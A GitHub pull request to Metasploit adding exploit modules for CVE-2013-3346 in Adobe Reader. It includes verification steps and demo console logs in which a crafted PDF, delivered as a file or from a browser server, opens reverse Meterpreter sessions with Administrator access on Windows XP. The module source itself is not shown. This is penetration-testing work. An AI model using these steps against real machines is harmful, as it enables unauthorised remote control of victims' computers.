Add module for CVE-2013-3346 #2770

Merged
merged 1 commit into from Dec 16, 2013

jvazquez-r7

As exploited in the wild in November 2013. Targeting Windows XP atm.

  • Fileformat version: targets Adobe Reader 9, 10, 11
  • Browser version: targets Adobe Reader 10, 11 (Internet Explorer)

Verification

  • Install Windows XP SP3
  • Install a vulnerable version of Adobe Reader
  • Use modules like in the demo, hopefully enjoy sessions

Demo

  • Fileformat:
msf exploit(adobe_toolbutton) > use exploit/windows/fileformat/adobe_toolbutton 
msf exploit(adobe_toolbutton) > rexploit
[*] Reloading module...

[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /Users/juan/.msf4/local/msf.pdf

msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 11 opened (192.168.172.1:4444 -> 192.168.172.244:2612) at 2013-12-16 13:40:20 -0600

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

  • Browser:

msf exploit(adobe_toolbutton) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://0.0.0.0:8080/YNxK0UmLGKp5o7
[*]  Local IP: http://10.6.0.165:8080/YNxK0UmLGKp5o7
[*] Server started.
msf exploit(adobe_toolbutton) > [*] 10.6.0.165       adobe_toolbutton - Gathering target information.
[*] 10.6.0.165       adobe_toolbutton - request: /YNxK0UmLGKp5o7/SvvljU/
[*] 10.6.0.165       adobe_toolbutton - Sending PDF...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1969) at 2013-12-16 13:26:01 -0600
msf exploit(adobe_toolbutton) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

@wchen-r7

Tested the file format module against the following versions:

  • 9.0.0
  • 10.1.4
  • 11.0.0

Tested the browser module:

Version 11.0.0:

msf exploit(adobe_toolbutton) > [*] 10.0.1.76        adobe_toolbutton - Gathering target information.
[*] 10.0.1.76        adobe_toolbutton - request: /vJyRX3LpVx7/OZQESX/
[*] 10.0.1.76        adobe_toolbutton - Sending PDF...
[*] Sending stage (769024 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:55130) at 2013-12-16 14:44:46 -0600

Version 10.1.2:

msf exploit(adobe_toolbutton) > [*] 10.0.1.76        adobe_toolbutton - Gathering target information.
[*] 10.0.1.76        adobe_toolbutton - request: /Kc0cLog6fmcooi/fnDgAG/
[*] 10.0.1.76        adobe_toolbutton - Sending PDF...
[*] Sending stage (769024 bytes) to 10.0.1.76
[*] Meterpreter session 2 opened (10.0.1.76:4444 -> 10.0.1.76:55152) at 2013-12-16 14:48:55 -0600

Both modules pass msftidy:

$ tools/msftidy.rb modules/exploits/windows/browser/adobe_toolbutton.rb 
$ tools/msftidy.rb modules/exploits/windows/fileformat/adobe_toolbutton.rb 

wchen-r7 added a commit that referenced this pull request Dec 16, 2013
@wchen-r7 wchen-r7 merged commit 533acca into rapid7:master Dec 16, 2013
@jvazquez-r7 jvazquez-r7 deleted the reader_toolbutton branch November 18, 2014 15:54